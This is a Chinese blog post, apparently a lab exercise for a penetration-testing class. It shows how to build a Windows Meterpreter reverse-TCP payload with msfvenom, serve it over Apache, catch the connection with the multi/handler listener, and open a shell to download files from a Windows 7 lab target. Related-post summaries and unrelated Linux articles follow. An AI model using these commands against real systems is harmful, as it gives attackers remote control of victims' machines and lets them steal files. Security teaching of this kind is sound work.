Metasploit被控端与主控端复现

seca_zero

已于 2024-10-27 18:32:16 修改

阅读量361

点赞数 3

CC 4.0 BY-SA版权

分类专栏：网络渗透文章标签： linux 网络安全

于 2024-10-27 12:08:12 首次发布

本文链接：https://blog.youkuaiyun.com/Sxd2395381864/article/details/143266112

网络渗透专栏收录该内容

10 篇文章

订阅专栏

攻击机ip：192.168.48.129

靶机ip：192.168.48.133

需要先安装Windows7靶机

Windows7安装

全程使用root

一、先在kali中生成被控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.129 lport=5000 -f exe -o /root/payload.exe

二、将生成的payload.exe放进/var/WWW/html/

然后启动Apache服务

service apache2 start

三、靶机下载payload.exe

访问主机IP下的payload.exe文件

192.168.48.129/payload.exe

四、开始控制

1、攻击机开启msfconsole, 进入metasploit(msf)的控制台

2、配置参数

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.48.129

set lport 5000

exploit

然后就是等待靶机运行payload.exe

3、靶机运行payload.exe

在攻击机里看到下图

并输入shell可以看到进入了靶机的终端，此时可以控制靶机了

exit退出靶机终端

4、尝试下载靶机内的文件

ls查看目录

download + 文件名下载文件

txt的内容为

五、放入网站检测payload.exe

http://www.virustotal.com

http://habo.qq.com

检测结果表示这是个木马

类型是Metasploit Connect

IP为192.168.48.129 port：5000

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

seca_zero

关注关注

3
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

杨秀璋的专栏

07-14

1253

上一篇文章将详细介绍Windows远程桌面服务漏洞（CVE-2019-0708），该高危漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞（CVE-2008-4250）及防御过程，它是Windows Server服务RPC请求缓冲区溢出漏洞，利用445端口，并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。

网络渗透测试漏洞复现任务

m0_64229840的博客

11-21

593

1、靶机(Windows)安装easy file sharing server（efssetup_2018.zip)，该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞，使得靶机运行计算器。P116-119

参与评论您还未登录，请先登录后发表或查看评论

Metasploit被控端与主控端复现（渗透课作业）

2303_79610394的博客

10-29

338

没有问题最后，background退回到handler模块，exit -y退出控制。virustools里分析一下，我们发现大部分供应商都发现了这是一个恶意软件。使用靶机打开payload.exe，我们发现成功连接，开一个shell看一看。没有问题，我们在看一看这台电脑里面有什么东西，使用handler模块，然后配置参数。虚拟机进入控制台msfconsole。下一个flag.txt看看怎么个事。

Metasploit被控端与主控端的复现检测

2301_80418279的博客

10-28

231

首先在kali中生成被控端，并将生成的payload.exe放入文件系统的/var/WWW/html/中接着使用指令：service apache2 start 启动启动Apache服务。

easy file sharing web server 漏洞复现及Metasploit被控端与主控端的使用

2201_75375302的博客

12-21

1111

VMware，kali-linux（整个复现过程命令框都得使用超级用户权限），win7（带Service pack 1的X64版本），easy file sharing web server软件（网上可查）红框中随便挑一个镜像，安装好虚拟机win7后千万不能将分辨率调太高，不然会卡成PPT，下面是安装完win7后需要的配置，解决屏幕过小，虚拟机和主机之间文件拖拽的问题。win7环境配置：由于微软更新了驱动程序签名算法，2019年开始弃用SHA1，改用SHA2。

Meterpreter—主控端远控被控端复现

xxx660308201的博客

10-30

496

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。

easy file sharing web server 复现 + msf被控端与主控端使用

WRplayeR的博客

12-20

602

1、靶机(Windows)安装easy file sharing server（efssetup_2018.zip)，该服务存在漏洞。选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块。使用命令msfvenom -p windows/meterpreter/reverse_tcp。退出命令行后使用download下载efssetup_20181文件，成功。3、利用该漏洞，使得靶机运行计算器。2、利用Nmap扫描发现靶机(Windows)运行了该服务。

复现对被控端控制

2403_88920807的博客

12-18

283

复现对被控端控制

复现对被控端的控制并检测

2301_80413992的博客

10-28

535

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能：打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息另外Meterpreter能够躲避入侵检测系统。

metasploit复现

weixin_54584489的博客

11-23

3120

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等

复现任务——漏洞渗透测试及Metasploit应用

m0_74087834的博客

12-29

1239

一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server（efssetup_2018.zip)，该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞，使得靶机运行计算器。见第六章PPT或PDF文档二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。见课本P127-133

复现任务A(漏洞渗透测试与Metasploit应用)

qq_61793472的博客

11-20

521

网络渗透测试课，复现任务A

简单漏洞复现_网络渗透测试

Radiency的博客

11-23

1805

利用easy file sharing server服务漏洞；远程控制目标，生成主控端、被控端，获得靶机控制权。

linux2.6 和 unix-v6 源码实验

is0815的博客

08-03

907

你可以通过实现 Linux 2.6.x 的源码级图形调试，能看到源码、变量、寄存器，非常适合研究内核启动过程。同理，可以编译 unix-v6 (https://github.com/mit-pdos/xv6-public.git)以下是使用xv6‑public（xv6 的 x86 版本）在 Ubuntu/Linux 上安装、编译、运行、调试的详细中文指南。如果你想使用 RISC‑V 版本（xv6‑riscv），后续内容里也有说明。面向 Intel x86 架构，使用 ELF 格式。

Linux 设备驱动程序（3）- 字符驱动（1）

qq_49477505的博客

08-02

1281

本文介绍了Linux字符设备驱动的开发流程，重点讲解了设备编号管理、核心数据结构及注册方法。字符设备驱动用于管理以字节流方式读写的设备，如串口、键盘等。开发时需处理主次设备号分配、file_operations结构定义、file/inode结构使用等关键环节。文章详细说明了静态/动态分配设备号的方法，以及通过cdev结构注册驱动的步骤（初始化、添加、创建节点等）。最后强调驱动卸载时要反向释放资源，包括删除设备文件、注销cdev结构等。整个流程体现了字符设备驱动如何在内核中建立设备编号与操作方法的关联机制。

Linux-进程优先级

m0_73936730的博客

08-04

567

简单的说优先级和权限的区别：老规矩：先写个简单的进程代码：进程优先级的修正数据，nice 值，nice其取值范围是-20至19，一共40个级别。新的优先级 = 优先级（默认80） + nice，这样，当nice值为负值的时候，那么该程序将会优先级值将变小，即其优先级会变高，则其越快被执行，所以调整进程优先级，在Linux下，就是调整进程nice值。再次修改nice值会失败，进程优先级不能经常修改我们语法格式：示例：语法格式：示例：

linux如何将两份hdmi edid合并

wang93IT的博客

07-31

804

本文介绍了三种合并HDMI EDID文件的方法，重点采用"保留EDID1基本信息+合并EDID1和EDID2时序"的策略。方法1使用Python实现EDID合并，包括读取文件、提取基本信息、合并去重时序、计算校验和等步骤。方法2通过Shell脚本实现，利用dd、xxd等命令行工具进行二进制操作。方法3提供C语言实现方案，适合嵌入式等高性能场景。文章详细分析了合并逻辑，指出EDID2相同时序会覆盖EDID1，并提供了验证合并结果的方法。三种方案各具特点，用户可根据需求选择合适的方法。

linux系列---【linux如何查看正在使用的所有端口(既列出部署的所有应用)】

-少年-的博客

08-01

203

n: Numeric，不解析服务名称，直接显示数字形式的端口号和IP地址(如显示 8080 而不是 http-alt)，速度更快。-p: Processes，显示使用该 socket 的进程信息(PID和进程名)，这个参数非常非常重要！使用方法同netstat，后面参数一样，用ss替换掉netstat即可。-l: 只显示正在 Listen (监听) 状态的 sockets。s: socket 的缩写，命令主体。-t: 显示 TCP sockets。-u: 显示 UDP sockets。

Linux Shell 命令详解